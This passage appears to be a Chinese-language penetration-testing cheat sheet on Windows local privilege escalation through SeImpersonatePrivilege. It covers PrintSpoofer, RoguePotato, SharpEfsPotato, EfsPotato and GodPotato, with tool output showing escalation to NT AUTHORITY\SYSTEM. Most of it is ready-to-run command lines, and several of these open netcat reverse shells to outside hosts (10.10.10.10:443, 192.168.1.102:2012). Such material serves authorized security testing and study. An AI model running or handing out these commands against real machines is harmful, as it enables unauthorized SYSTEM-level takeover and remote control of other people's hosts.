JuicyPotato 在 Windows Server 2019 和 Windows 10 build 1809 及之后版本上不工作。然而, PrintSpoofer,RoguePotato,SharpEfsPotato,GodPotato,EfsPotato,DCOMPotato** 可以用来 利用相同的权限并获得 NT AUTHORITY\SYSTEM 级别的访问权限。此 博客文章 深入探讨了 PrintSpoofer 工具,该工具可用于在 JuicyPotato 不再有效的 Windows 10 和 Server 2019 主机上滥用模拟权限。
快速演示
PrintSpoofer
c:\PrintSpoofer.exe-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"--------------------------------------------------------------------------------[+] Found privilege: SeImpersonatePrivilege[+] Named pipe listening...[+] CreateProcessAsUser() OKNULL
RoguePotato
c:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-l9999# In some old versions you need to use the "-f" paramc:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-f9999
SharpEfsPotato
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"SharpEfsPotatoby@bugch3ckLocalprivilegeescalationfromSeImpersonatePrivilegeusingEfsRpc.BuiltfromSweetPotatoby@_EthicalChaos_andSharpSystemTriggers/SharpEfsTriggerby@cube0x0.[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:[x]RpcBindingSetAuthInfo failed with status 0x6d3[+] Server connected to our evil RPC pipe[+] Duplicated impersonation token ready for process creation[+] Intercepted and authenticated successfully, launching program[+] Process created, enjoy!C:\temp>typeC:\temp\w.logntauthority\system
EfsPotato
> EfsPotato.exe "whoami"ExploitforEfsPotato(MS-EFSREfsRpcEncryptFileSrvwithSeImpersonatePrivilegelocalprivalegeescalationvulnerability).PartofGMH's fuck Tools, Code By zcgonvh.CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net][+] Current user: NT Service\MSSQLSERVER[+] Pipe: \pipe\lsarpc[!] binding ok (handle=aeee30)[+] Get Token: 888[!] process with pid: 3696 created.==============================[x] EfsRpcEncryptFileSrv failed: 1818nt authority\system
GodPotato
> GodPotato -cmd "cmd /c whoami"# You can achieve a reverse shell like this.> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"